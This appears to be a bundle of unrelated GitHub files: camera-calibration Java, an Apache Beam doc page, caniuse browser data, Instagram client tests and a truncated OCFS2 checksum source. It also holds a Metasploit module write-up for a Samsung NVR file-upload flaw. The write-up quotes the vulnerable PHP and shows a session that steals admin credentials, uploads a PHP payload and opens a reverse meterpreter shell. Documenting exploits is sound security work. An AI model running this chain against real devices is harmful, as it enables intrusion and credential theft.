Full implementation of the Zhang99 camera calibration algorithm using planar calibration targets. First * linear approximations of camera parameters are computed, which are then refined using non-linear estimation. * One difference from the original paper is that tangential distortion can be included. No linear estimate * if found for tangential, they are estimated by initializing the non-linear estimate with all zero. * </p> * * <p> * When processing the results be sure to take in account the coordinate system being left or right handed. Calibration * works just fine with either coordinate system, but most 3D geometric algorithms assume a right handed coordinate * system while most images are left handed. * </p> * * <p> * A listener can be provide that will give status updates and allows requests for early termination. If a request * for early termination is made then a RuntimeException will be thrown. * </p> * * <p> * [1] Zhengyou Zhang, "Flexible Camera Calibration By Viewing a Plane From Unknown Orientations,", * International Conference on Computer Vision (ICCV'99), Corfu, Greece, pages 666-673, September 1999. * </p> * * @author Peter Abeles */ public class CalibrationPlanarGridZhang99 implements VerbosePrint { Zhang99Camera cameraGenerator; // estimation algorithms private final Zhang99ComputeTargetHomography computeHomography; private final Zhang99CalibrationMatrixFromHomographies computeK; private final RadialDistortionEstimateLinear computeRadial; private final Zhang99DecomposeHomography decomposeH = new Zhang99DecomposeHomography(); // contains found parameters public SceneStructureMetric structure; public SceneObservations observations; // provides information on calibration status private Listener listener; // where calibration points are layout on the target. private final List<Point2D_F64> layout; // Use a robust non-linear solver. This can run significantly slower private boolean robust = false; private PrintStream verbose = null; /** * Configures calibration process. * * @param layout Layout of calibration points on the target */ public CalibrationPlanarGridZhang99( List<Point2D_F64> layout, Zhang99Camera cameraGenerator ) { this.cameraGenerator = cameraGenerator; this.layout = layout; computeHomography = new Zhang99ComputeTargetHomography(layout); computeK = new Zhang99CalibrationMatrixFromHomographies(cameraGenerator.isZeroSkew()); computeRadial = new RadialDistortionEstimateLinear(layout, cameraGenerator.numRadial()); } /** * Used to listen in on progress and request that processing be stopped * * @param listener The listener */ public void setListener( Listener listener ) { this.listener = listener; } /** * Processes observed calibration point coordinates and computes camera intrinsic and extrinsic * parameters. * * @param observations Set of observed grid locations in pixel coordinates. * @return true if successful and false if it failed */ public boolean process( List<CalibrationObservation> observations ) { // compute initial parameter estimates using linear algebra if (!linearEstimate(observations)) return false; status("Non-linear refinement"); // perform non-linear optimization to improve results if (!performBundleAdjustment()) return false; return true; } /** * Find an initial estimate for calibration parameters using linear techniques. */ protected boolean linearEstimate( List<CalibrationObservation> observations ) { status("Estimating Homographies"); List<DMatrixRMaj> homographies = new ArrayList<>(); List<Se3_F64> motions = new ArrayList<>(); for (CalibrationObservation obs : observations) { if (!computeHomography.computeHomography(obs)) return false; DMatrixRMaj H = computeHomography.getHomography(); homographies.add(H); } status("Estimating Calibration Matrix"); computeK.process(homographies); DMatrixRMaj K = computeK.getCalibrationMatrix(); decomposeH.setCalibrationMatrix(K); for (DMatrixRMaj H : homographies) { motions.add(decomposeH.decompose(H)); } status("Estimating Radial Distortion"); computeRadial.process(K, homographies, observations); double[] distort = computeRadial.getParameters(); convertIntoBundleStructure(motions, K, distort, observations); return true; } private void status( String message ) { if (listener != null) { if (!listener.zhangUpdate(message)) throw new RuntimeException("User requested termination of calibration"); } } /** * Use non-linear optimization to improve the parameter estimates */ public boolean performBundleAdjustment() { // Configure the sparse Levenberg-Marquardt solver ConfigLevenbergMarquardt configLM = new ConfigLevenbergMarquardt(); configLM.hessianScaling = false; ConfigBundleAdjustment configSBA = new ConfigBundleAdjustment(); configSBA.configOptimizer = configLM; BundleAdjustment<SceneStructureMetric> bundleAdjustment; if (robust) { configLM.mixture = 0; bundleAdjustment = FactoryMultiView.bundleDenseMetric(true, configSBA); } else { bundleAdjustment = FactoryMultiView.bundleSparseMetric(configSBA); } bundleAdjustment.setVerbose(verbose, null); // Specifies convergence criteria bundleAdjustment.configure(1e-20, 1e-20, 200); bundleAdjustment.setParameters(structure, observations); return bundleAdjustment.optimize(structure); } /** * Convert it into a data structure understood by {@link BundleAdjustment} */ public void convertIntoBundleStructure( List<Se3_F64> motions, DMatrixRMaj K, double[] distort, List<CalibrationObservation> obs ) { structure = new SceneStructureMetric(false); structure.initialize(1, motions.size(), -1, layout.size(), 1); observations = new SceneObservations(); observations.initialize(motions.size(), true); // A single camera is assumed, that's what is being calibrated! structure.setCamera(0, false, cameraGenerator.initalizeCamera(K, distort)); // A single rigid planar target is being viewed. It is assumed to be centered at the origin structure.setRigid(0, true, new Se3_F64(), layout.size()); // Where the points are on the calibration target SceneStructureMetric.Rigid rigid = structure.rigids.data[0]; for (int i = 0; i < layout.size(); i++) { rigid.setPoint(i, layout.get(i).x, layout.get(i).y, 0); } // Add the initial estimate of each view's location and the points observed for (int viewIdx = 0; viewIdx < motions.size(); viewIdx++) { structure.setView(viewIdx, 0, false, motions.get(viewIdx)); SceneObservations.View v = observations.getViewRigid(viewIdx); CalibrationObservation ca = obs.get(viewIdx); for (int j = 0; j < ca.size(); j++) { PointIndex2D_F64 p = ca.get(j); v.add(p.index, (float)p.x, (float)p.y); structure.connectPointToView(p.index, viewIdx); } } } public List<ImageResults> computeErrors() { List<ImageResults> errors = new ArrayList<>(); double[] parameters = new double[structure.getParameterCount()]; double[] residuals = new double[observations.getObservationCount()*2]; CodecSceneStructureMetric codec = new CodecSceneStructureMetric(); codec.encode(structure, parameters); BundleAdjustmentMetricResidualFunction function = new BundleAdjustmentMetricResidualFunction(); function.configure(structure, observations); function.process(parameters, residuals); int idx = 0; for (int i = 0; i < observations.viewsRigid.size; i++) { SceneObservations.View v = observations.viewsRigid.data[i]; ImageResults r = new ImageResults(v.size()); double sumX = 0; double sumY = 0; double meanErrorMag = 0; double maxError = 0; for (int j = 0; j < v.size(); j++) { double x = residuals[idx++]; double y = residuals[idx++]; double nerr = r.pointError[j] = Math.sqrt(x*x + y*y); meanErrorMag += nerr; maxError = Math.max(maxError, nerr); sumX += x; sumY += y; } r.biasX = sumX/v.size(); r.biasY = sumY/v.size(); r.meanError = meanErrorMag/v.size(); r.maxError = maxError; errors.add(r); } return errors; } public CameraModel getCameraModel() { return cameraGenerator.getCameraModel(structure.cameras.get(0).model); } /** * Applies radial and tangential distortion to the normalized image coordinate. * * @param normPt point in normalized image coordinates * @param radial radial distortion parameters * @param t1 tangential parameter * @param t2 tangential parameter */ public static void applyDistortion( Point2D_F64 normPt, double[] radial, double t1, double t2 ) { final double x = normPt.x; final double y = normPt.y; double a = 0; double r2 = x*x + y*y; double r2i = r2; for (int i = 0; i < radial.length; i++) { a += radial[i]*r2i; r2i *= r2; } normPt.x = x + x*a + 2*t1*x*y + t2*(r2 + 2*x*x); normPt.y = y + y*a + t1*(r2 + 2*y*y) + 2*t2*x*y; } public SceneStructureMetric getStructure() { return structure; } public void setRobust( boolean robust ) { this.robust = robust; } public static int totalPoints( List<CalibrationObservation> observations ) { int total = 0; for (int i = 0; i < observations.size(); i++) { total += observations.get(i).size(); } return total; } @Override public void setVerbose( @Nullable PrintStream out, @Nullable Set<String> configuration ) { this.verbose = out; } public interface Listener { /** * Updated to update the status and request that processing be stopped * * @param taskName Name of the task being performed * @return true to continue and false to request a stop */ boolean zhangUpdate( String taskName ); } }
{ "pile_set_name": "Github" }
--- title: "Reshuffle" --- <!-- Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> # Reshuffle <table align="left"> <a target="_blank" class="button" href="https://beam.apache.org/releases/pydoc/current/apache_beam.transforms.util.html?highlight=reshuffle#apache_beam.transforms.util.Reshuffle"> <img src="https://beam.apache.org/images/logos/sdks/python.png" width="20px" height="20px" alt="Pydoc" /> Pydoc </a> </table> <br><br> Adds a temporary random key to each element in a collection, reshuffles these keys, and removes the temporary key. This redistributes the elements between workers and returns a collection equivalent to its input collection. This is most useful for adjusting parallelism or preventing coupled failures. ## Examples See [BEAM-7391](https://issues.apache.org/jira/browse/BEAM-7391) for updates. ## Related transforms N/A
{ "pile_set_name": "Github" }
{ "title":"CSS Initial Letter", "description":"Method of creating an enlarged cap, including a drop or raised cap, in a robust way.", "spec":"https://www.w3.org/TR/css-inline/#initial-letter-styling", "status":"wd", "links":[ { "url":"https://bugzilla.mozilla.org/show_bug.cgi?id=1223880", "title":"Firefox Implementation Ticket" }, { "url":"https://developer.mozilla.org/en-US/docs/Web/CSS/initial-letter", "title":"MDN Web Docs - CSS initial-letter" }, { "url":"https://webdesign.tutsplus.com/tutorials/better-css-drop-caps-with-initial-letter--cms-26350", "title":"Blog post on Envato Tuts+, \"Better CSS Drop Caps With initial-letter\"" }, { "url":"http://labs.jensimmons.com/#initialletter", "title":"Demos at Jen Simmons Labs" } ], "bugs":[ { "description":"Safari 9 doesn't properly shorten the first line of text. Applying `margin-top: 1em` to the letter fixes this problem." } ], "categories":[ "CSS" ], "stats":{ "ie":{ "5.5":"n", "6":"n", "7":"n", "8":"n", "9":"n", "10":"n", "11":"n" }, "edge":{ "12":"n", "13":"n", "14":"n", "15":"n", "16":"n", "17":"n", "18":"n" }, "firefox":{ "2":"n", "3":"n", "3.5":"n", "3.6":"n", "4":"n", "5":"n", "6":"n", "7":"n", "8":"n", "9":"n", "10":"n", "11":"n", "12":"n", "13":"n", "14":"n", "15":"n", "16":"n", "17":"n", "18":"n", "19":"n", "20":"n", "21":"n", "22":"n", "23":"n", "24":"n", "25":"n", "26":"n", "27":"n", "28":"n", "29":"n", "30":"n", "31":"n", "32":"n", "33":"n", "34":"n", "35":"n", "36":"n", "37":"n", "38":"n", "39":"n", "40":"n", "41":"n", "42":"n", "43":"n", "44":"n", "45":"n", "46":"n", "47":"n", "48":"n", "49":"n", "50":"n", "51":"n", "52":"n", "53":"n", "54":"n", "55":"n", "56":"n", "57":"n", "58":"n", "59":"n", "60":"n", "61":"n", "62":"n", "63":"n" }, "chrome":{ "4":"n", "5":"n", "6":"n", "7":"n", "8":"n", "9":"n", "10":"n", "11":"n", "12":"n", "13":"n", "14":"n", "15":"n", "16":"n", "17":"n", "18":"n", "19":"n", "20":"n", "21":"n", "22":"n", "23":"n", "24":"n", "25":"n", "26":"n", "27":"n", "28":"n", "29":"n", "30":"n", "31":"n", "32":"n", "33":"n", "34":"n", "35":"n", "36":"n", "37":"n", "38":"n", "39":"n", "40":"n", "41":"n", "42":"n", "43":"n", "44":"n", "45":"n", "46":"n", "47":"n", "48":"n", "49":"n", "50":"n", "51":"n", "52":"n", "53":"n", "54":"n", "55":"n", "56":"n", "57":"n", "58":"n", "59":"n", "60":"n", "61":"n", "62":"n", "63":"n", "64":"n", "65":"n", "66":"n", "67":"n", "68":"n", "69":"n", "70":"n", "71":"n" }, "safari":{ "3.1":"n", "3.2":"n", "4":"n", "5":"n", "5.1":"n", "6":"n", "6.1":"n", "7":"n", "7.1":"n", "8":"n", "9":"a", "9.1":"a x #1", "10":"a x #1", "10.1":"a x #1", "11":"a x #1", "11.1":"a x #1", "12":"a x #1", "TP":"a x #1" }, "opera":{ "9":"n", "9.5-9.6":"n", "10.0-10.1":"n", "10.5":"n", "10.6":"n", "11":"n", "11.1":"n", "11.5":"n", "11.6":"n", "12":"n", "12.1":"n", "15":"n", "16":"n", "17":"n", "18":"n", "19":"n", "20":"n", "21":"n", "22":"n", "23":"n", "24":"n", "25":"n", "26":"n", "27":"n", "28":"n", "29":"n", "30":"n", "31":"n", "32":"n", "33":"n", "34":"n", "35":"n", "36":"n", "37":"n", "38":"n", "39":"n", "40":"n", "41":"n", "42":"n", "43":"n", "44":"n", "45":"n", "46":"n", "47":"n", "48":"n", "49":"n", "50":"n", "51":"n", "52":"n", "53":"n" }, "ios_saf":{ "3.2":"n", "4.0-4.1":"n", "4.2-4.3":"n", "5.0-5.1":"n", "6.0-6.1":"n", "7.0-7.1":"n", "8":"n", "8.1-8.4":"n", "9.0-9.2":"a x #1", "9.3":"a x #1", "10.0-10.2":"a x #1", "10.3":"a x #1", "11.0-11.2":"a x #1", "11.3-11.4":"a x #1", "12":"a x #1" }, "op_mini":{ "all":"n" }, "android":{ "2.1":"n", "2.2":"n", "2.3":"n", "3":"n", "4":"n", "4.1":"n", "4.2-4.3":"n", "4.4":"n", "4.4.3-4.4.4":"n", "67":"n" }, "bb":{ "7":"n", "10":"n" }, "op_mob":{ "10":"n", "11":"n", "11.1":"n", "11.5":"n", "12":"n", "12.1":"n", "46":"n" }, "and_chr":{ "67":"n" }, "and_ff":{ "60":"n" }, "ie_mob":{ "10":"n", "11":"n" }, "and_uc":{ "11.8":"n" }, "samsung":{ "4":"n", "5":"n", "6.2":"n", "7.2":"n" }, "and_qq":{ "1.2":"n" }, "baidu":{ "7.12":"n" } }, "notes":"", "notes_by_num":{ "1":"Safari implementation is incomplete. Does not allow applying web fonts to the initial letter." }, "usage_perc_y":0, "usage_perc_a":11.93, "ucprefix":false, "parent":"", "keywords":"initial-letter,initial letter,letter,drop cap,dropcap", "ie_id":"initialletter", "chrome_id":"", "firefox_id":"css-initial-letter", "webkit_id":"feature-initial-letter", "shown":true }
{ "pile_set_name": "Github" }
// tslint:disable-next-line no-implicit-dependencies import * as nock from 'nock'; import Instagram from '../src/index'; describe('Instagram', () => { it('should be a class', () => { const instagram = new Instagram({} as any); expect(instagram instanceof Instagram).toBeTruthy(); }); it('should set clientId and accessToken', () => { const instagram = new Instagram({ clientId: 'toto', accessToken: 'toto2', } as any); expect((instagram as any).config.clientId).toEqual('toto'); expect((instagram as any).config.accessToken).toEqual('toto2'); }); describe('#request', () => { const instagram = new Instagram({ accessToken: 'toto', } as any); it('sould add access_token in query', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(200, { message: 'success' }); const result = await (instagram as any).request('GET', endpoint); expect(result).toMatchSnapshot(); }); it('sould overwrite access_token in query', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'titi' }) .reply(200, { message: 'success' }); const result = await (instagram as any).request('GET', endpoint, { accessToken: 'titi', }); expect(result).toMatchSnapshot(); }); it('sould return an error', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(400, { message: 'error' }); try { await (instagram as any).request('GET', endpoint); } catch (err) { expect(err).toMatchSnapshot(); } }); it('sould call callback with value', done => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(200, { message: 'success' }); (instagram as any).request('GET', endpoint, (_, result) => { expect(result).toMatchSnapshot(); done(); }); }); it('sould call callback with error', done => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(400, { message: 'error' }); (instagram as any).request('GET', endpoint, err => { expect(err).toMatchSnapshot(); done(); }); }); }); describe('#get', () => { const instagram = new Instagram({ accessToken: 'toto', } as any); it('sould make get request', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(200, { message: 'success' }); const result = await instagram.get(endpoint); expect(result).toMatchSnapshot(); }); }); describe('#post', () => { const instagram = new Instagram({ accessToken: 'toto', } as any); it('sould make post request', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .post(`/v1/${endpoint}`, { access_token: 'toto', }) .reply(200, { message: 'success' }); const result = await instagram.post(endpoint); expect(result).toMatchSnapshot(); }); }); describe('#delete', () => { const instagram = new Instagram({ accessToken: 'toto', } as any); it('sould make delete request', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .delete(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(200, { message: 'success' }); const result = await instagram.delete(endpoint); expect(result).toMatchSnapshot(); }); }); describe('#getAuthorizationUrl', () => { const instagram = new Instagram({ clientId: 'clientId', accessToken: 'toto', } as any); const redirectUrl = 'http://localhost:3000'; it('sould generate authorization url', async () => { const url = instagram.getAuthorizationUrl(redirectUrl); expect(url).toMatchSnapshot(); }); it('sould generate pass scope', async () => { const url = instagram.getAuthorizationUrl(redirectUrl, { scope: 'likes', }); expect(url).toMatchSnapshot(); }); it('sould generate pass scope array', async () => { const url = instagram.getAuthorizationUrl(redirectUrl, { scope: ['likes', 'basic'], }); expect(url).toMatchSnapshot(); }); it('sould generate pass state', async () => { const url = instagram.getAuthorizationUrl(redirectUrl, { state: 'hey' }); expect(url).toMatchSnapshot(); }); }); describe('#authorizeUser', () => { const instagram = new Instagram({ clientId: 'clientId', clientSecret: 'clientSecret', } as any); const code = 'my-code'; const redirectUrl = 'http://localhost:3000'; it('sould make post request', async () => { nock('https://api.instagram.com') .post('/oauth/access_token', { code, redirect_uri: redirectUrl, client_id: 'clientId', client_secret: 'clientSecret', grant_type: 'authorization_code', }) .reply(200, { message: 'success' }); const result = await instagram.authorizeUser(code, redirectUrl); expect(result).toMatchSnapshot(); }); }); });
{ "pile_set_name": "Github" }
## Description Samsung NVR Recorder SRN-1670D is a high performance network video recorder. An arbitrary file upload vulnerability was found in the Web Viewer component, which could allow an authenticated user to upload a PHP payload to get code exuection. The vulnerable code can be found in network_ssl_upload.php: ```php 22 $path = "./upload/"; 23 $file = $_FILES[ "attachFile" ]; 24 $isApply = ( int )$_POST[ "is_apply" ]; 25 $isInstall = ( int )$_POST[ "isInstall" ]; 26 $isCertFlag = ( int )$_POST[ "isCertFlag" ]; 27 28 // create socket 29 $N_message = ""; 30 $sock = mySocket_create($_is_unix_socket); 31 $connected = mySocket_connect($_is_unix_socket, $sock); 32 33 $loginInfo = new loginInfo(); 34 $retLogin = loginManager( $connected, $sock, null, $loginInfo ); 35 if ( ( $retLogin == true ) && ( $isApply == 2 || $isApply == 3 ) ) { 36 if ($connected) { 37 $id = $loginInfo->get_id(); 38 $xmlFile = $id.'_config.xml'; 39 $N_message = "dummy".nvr_command::DELIM; 40 $N_message .= "userid ".$id.nvr_command::DELIM; 41 42 if ( $isInstall == 1 ) { 43 // File upload =============================================================== 44 if ( $file[ "error" ] 0 ) { 45 $Error = "Error: ".$file[ "error" ]; 46 } else { 47 $retFile = @copy( $file[ "tmp_name" ], $path.$file[ "name" ] ); 48 } 49 // =========================================================================== 50 } ``` To avoid the need of authentication, the exploit also takes advantage of another vulnerability (CVE-2015-8279) in the log exporting function to read an aribtrary file from the remote machine in order to obtain credentials that can be used for the attack. ## Vulnerable Application Samsung NVR Recorder SRN-1670D is a hardware: http://www.samsungcc.com.au/cctv/ip-nvr-solution/samsung-dvr-srn-1670d ## Scenarios ``` msf exploit(samsung_srv_1670d_upload_exec) > show options Module options (exploit/multi/http/samsung_srv_1670d_upload_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.1.200 yes The target address. RPORT 80 yes The target port (TCP). SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.1.122 yes The listen address LPORT 4358 yes The listen port Exploit target: Id Name -- ---- 0 Samsung SRN-1670D == 1.0.0.193 msf exploit(samsung_srv_1670d_upload_exec) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.1.122:4358 msf exploit(samsung_srv_1670d_upload_exec) > [*] Obtaining credentails... [+] Credentials obtained successfully: admin:pass123! [*] Logging... [+] Authentication Succeeded [*] Generating payload[ eRdGKfFJ.php ]... [*] Uploading payload... [*] Executing payload... [*] Sending stage (33986 bytes) to 192.168.1.200 [*] Meterpreter session 3 opened (192.168.1.122:4358 -> 192.168.1.200:55676) at 2017-06-19 11:52:22 +0100 ```
{ "pile_set_name": "Github" }
/* -*- mode: c; c-basic-offset: 8; -*- * vim: noexpandtab sw=8 ts=8 sts=0: * * blockcheck.c * * Checksum and ECC codes for the OCFS2 userspace library. * * Copyright (C) 2006, 2008 Oracle. All rights reserved. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public * License, version 2, as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. */ #include <linux/kernel.h> #include <linux/types.h> #include <linux/crc32.h> #include <linux/buffer_head.h> #include <linux/bitops.h> #include <linux/debugfs.h> #include <linux/module.h> #include <linux/fs.h> #include <asm/byteorder.h> #include <cluster/masklog.h> #include "ocfs2.h" #include "blockcheck.h" /* * We use the following conventions: * * d = # data bits * p = # parity bits * c = # total code bits (d + p) */ /* * Calculate the bit offset in the hamming code buffer based on the bit's * offset in the data buffer. Since the hamming code reserves all * power-of-two bits for parity, the data bit number and the code bit * number are offset by all the parity bits beforehand. * * Recall that bit numbers in hamming code are 1-based. This function * takes the 0-based data bit from the caller. * * An example. Take bit 1 of the data buffer. 1 is a power of two (2^0), * so it's a parity bit. 2 is a power of two (2^1), so it's a parity bit. * 3 is not a power of two. So bit 1 of the data buffer ends up as bit 3 * in the code buffer. * * The caller can pass in *p if it wants to keep track of the most recent * number of parity bits added. This allows the function to start the * calculation at the last place. */ static unsigned int calc_code_bit(unsigned int i, unsigned int *p_cache) { unsigned int b, p = 0; /* * Data bits are 0-based, but we're talking code bits, which * are 1-based. */ b = i + 1; /* Use the cache if it is there */ if (p_cache) p = *p_cache; b += p; /* * For every power of two below our bit number, bump our bit. * * We compare with (b + 1) because we have to compare with what b * would be _if_ it were bumped up by the parity bit. Capice? * * p is set above. */ for (; (1 << p) < (b + 1); p++) b++; if (p_cache) *p_cache = p; return b; } /* * This is the low level encoder function. It can be called across * multiple hunks just like the crc32 code. 'd' is the number of bits * _in_this_hunk_. nr is the bit offset of this hunk. So, if you had * two 512B buffers, you would do it like so: * * parity = ocfs2_hamming_encode(0, buf1, 512 * 8, 0); * parity = ocfs2_hamming_encode(parity, buf2, 512 * 8, 512 * 8); * * If you just have one buffer, use ocfs2_hamming_encode_block(). */ u32 ocfs2_hamming_encode(u32 parity, void *data, unsigned int d, unsigned int nr) { unsigned int i, b, p = 0; BUG_ON(!d); /* * b is the hamming code bit number. Hamming code specifies a * 1-based array, but C uses 0-based. So 'i' is for C, and 'b' is * for the algorithm. * * The i++ in the for loop is so that the start offset passed * to ocfs2_find_next_bit_set() is one greater than the previously * found bit. */ for (i = 0; (i = ocfs2_find_next_bit(data, d, i)) < d; i++) { /* * i is the offset in this hunk, nr + i is the total bit * offset. */ b = calc_code_bit(nr + i, &p); /* * Data bits in the resultant code are checked by * parity bits that are part of the bit number * representation. Huh? * * <wikipedia href="http://en.wikipedia.org/wiki/Hamming_code"> * In other words, the parity bit at position 2^k * checks bits in positions having bit k set in * their binary representation. Conversely, for * instance, bit 13, i.e. 1101(2), is checked by * bits 1000(2) = 8, 0100(2)=4 and 0001(2) = 1. * </wikipedia> * * Note that 'k' is the _code_ bit number. 'b' in * our loop. */ parity ^= b; } /* While the data buffer was treated as little endian, the * return value is in host endian. */ return parity; } u32 ocfs2_hamming_encode_block(void *data, unsigned int blocksize) { return ocfs2_hamming_encode(0, data, blocksize * 8, 0); } /* * Like ocfs2_hamming_encode(), this can handle hunks. nr is the bit * offset of the current hunk. If bit to be fixed is not part of the * current hunk, this does nothing. * * If you only have one hunk, use ocfs2_hamming_fix_block(). */ void ocfs2_hamming_fix(void *data, unsigned int d, unsigned int nr, unsigned int fix) { unsigned int i, b; BUG_ON(!d); /* * If the bit to fix has an hweight of 1, it's a parity bit. One * busted parity bit is its own error. Nothing to do here. */ if (hweight32(fix) == 1) return; /* * nr + d is the bit right past the data hunk we're looking at. * If fix after that, nothing to do */ if (fix >= calc_code_bit(nr + d, NULL)) return; /* * nr is the offset in the data hunk we're starting at. Let's * start b at the offset in the code buffer. See hamming_encode() * for a more detailed description of 'b'. */ b = calc_code_bit(nr, NULL); /* If the fix is before this hunk, nothing to do */ if (fix < b) return; for (i = 0; i < d; i++, b++) { /* Skip past parity bits */ while (hweight32(b) == 1) b++; /* * i is the offset in this data hunk. * nr + i is the offset in the total data buffer. * b is the offset in the total code buffer. * * Thus, when b == fix, bit i in the current hunk needs * fixing. */ if (b == fix) { if (ocfs2_test_bit(i, data)) ocfs2_clear_bit(i, data); else ocfs2_set_bit(i, data); break; } } } void ocfs2_hamming_fix_block(void *data, unsigned int blocksize, unsigned int fix) { ocfs2_hamming_fix(data, blocksize * 8, 0, fix); } /* * Debugfs handling. */ #ifdef CONFIG_DEBUG_FS static int blockcheck_u64_get(void *data, u64 *val) { *val = *(u64 *)data; return 0; } DEFINE_SIMPLE_ATTRIBUTE(blockcheck_fops, blockcheck_u64_get, NULL, "%llu\n"); static struct dentry *blockcheck_debugfs_create(const char *name, struct dentry *parent, u64 *value) { return debugfs_create_file(name, S_IFREG | S_IRUSR, parent, value, &blockcheck_fops); } static void ocfs2_blockcheck_debug_remove(struct ocfs2_blockcheck_stats *stats) { if (stats) { debugfs_remove(stats->b_debug_check); stats->b_debug_check = NULL; debugfs_remove(stats->b_debug_failure); stats->b_debug_failure = NULL; debugfs_remove(stats->b_debug_recover); stats->b_debug_recover = NULL; debugfs_remove(stats->b_debug_dir); stats->b_debug_dir = NULL; } } static int ocfs2_blockcheck_debug_install(struct ocfs2_blockcheck_stats *stats, struct dentry *parent) { int rc = -EINVAL; if (!stats) goto out; stats->b_debug_dir = debugfs_create_dir("blockcheck", parent); if (!stats->b_debug_dir) goto out; stats->b_debug_check = blockcheck_debugfs_create("blocks_checked", stats->b_debug_dir, &stats->b_check_count); stats->b_debug_failure = blockcheck_debugfs_create("checksums_failed", stats->b_debug_dir, &stats->b_failure_count); stats->b_debug_recover = blockcheck_debugfs_create("ecc_recoveries", stats->b_debug_dir, &stats->b_recover_count); if (stats->b_debug_check && stats->b_debug_failure && stats->b_debug_recover) rc = 0; out: if (rc) ocfs2_blockcheck_debug_remove(stats); return rc; } #else static inline int ocfs2_blockcheck_debug_install(struct ocfs2_blockcheck_stats *stats, struct dentry *parent) { return 0; } static inline void ocfs2_blockcheck_debug_remove(struct ocfs2_blockcheck_stats *stats) { } #endif /* CONFIG_DEBUG_FS */ /* Always-called wrappers for starting and stopping the debugfs files */ int ocfs2_blockcheck_stats_debugfs_install(struct ocfs2_blockcheck_stats *stats, struct dentry *parent) { return ocfs2_blockcheck_debug_install(stats, parent); } void ocfs2_blockcheck_stats_debugfs_remove(struct ocfs2_blockcheck_stats *stats) { ocfs2_blockcheck_debug_remove(stats); } static void ocfs2_blockcheck_inc_check(struct ocfs2_blockcheck_stats *stats) { u64 new_count; if (!stats) return; spin_lock(&stats->b_lock); stats->b_check_count++; new_count = stats->b_check_count; spin_unlock(&stats->b_lock); if (!new_count) mlog(ML_NOTICE, "Block check count has wrapped\n"); } static void ocfs2_blockcheck_inc_failure(struct ocfs2_blockcheck_stats *stats) { u64 new_count; if (!stats) return; spin_lock(&stats->b_lock); stats->b_failure_count++; new_count = stats->b_failure_count; spin_unlock(&stats->b_lock); if (!new_count) mlog(ML_NOTICE, "Checksum failure count has wrapped\n"); } static void ocfs2_blockcheck_inc_recover(struct ocfs2_blockcheck_stats *stats) { u64 new_count; if (!stats) return; spin_lock(&stats->b_lock); stats->b_recover_count++; new_count = stats->b_recover_count; spin_unlock(&stats->b_lock); if (!new_count) mlog(ML_NOTICE, "ECC recovery count has wrapped\n"); } /* * These are the low-level APIs for using the ocfs2_block_check structure. */ /* * This function generates check information for a block. * data is the block to be checked. bc is a pointer to the * ocfs2_block_check structure describing the crc32 and the ecc. * * bc should be a pointer inside data, as the function will * take care of zeroing it before calculating the check information. If * bc does not point inside data, the caller must make sure any inline * ocfs2_block_check structures are zeroed. * * The data buffer must be in on-disk endian (little endian for ocfs2). * bc will be filled with little-endian values and will be ready to go to * disk. */ void ocfs2_block_check_compute(void *data, size_t blocksize, struct ocfs2_block_check *bc) { u32 crc; u32 ecc; memset(bc, 0, sizeof(struct ocfs2_block_check)); crc = crc32_le(~0, data, blocksize); ecc = ocfs2_hamming_encode_block(data, blocksize); /* * No ecc'd ocfs2 structure is larger than 4K, so ecc will be no * larger than 16 bits. */ BUG_ON(ecc > USHRT_MAX); bc->bc_crc32e = cpu_to_le32(crc); bc->bc_ecc = cpu_to_le16((u16)ecc); } /* * This function validates existing check information. Like _compute, * the function will take care of zeroing bc before calculating check codes. * If bc is not a pointer inside data, the caller must have zeroed any * inline ocfs2_block_check structures. * * Again, the data passed in should be the on-disk endian. */ int ocfs2_block_check_validate(void *data, size_t blocksize, struct ocfs2_block_check *bc, struct ocfs2_blockcheck_stats *stats) { int rc = 0; u32 bc_crc32e; u16 bc_ecc; u32 crc, ecc; ocfs2_blockcheck_inc_check(stats); bc_crc32e = le32_to_cpu(bc->bc_crc32e); bc_ecc = le16_to_cpu(bc->bc_ecc); memset(bc, 0, sizeof(struct ocfs2_block_check)); /* Fast path - if the crc32 validates, we're good to go */ crc = crc32_le(~0, data, blocksize); if (crc == bc_crc32e) goto out; ocfs2_blockcheck_inc_failure(stats); mlog(ML_ERROR, "CRC32 failed: stored: 0x%x, computed 0x%x. Applying ECC.\n", (unsigned int)bc_crc32e, (unsigned int)crc); /* Ok, try ECC fixups */ ecc = ocfs2_hamming_encode_block(data, blocksize); ocfs2_hamming_fix_block(data, blocksize, ecc ^ bc_ecc); /* And check the crc32 again */ crc = crc32_le(~0, data, blocksize); if (crc == bc_crc32e) { ocfs2_blockcheck_inc_recover(stats); goto out; } mlog(ML_ERROR, "Fixed CRC32 failed: stored: 0x%x, computed 0x%x\n", (unsigned int)bc_crc32e, (unsigned int)crc); rc = -EIO; out: bc->bc_crc32e = 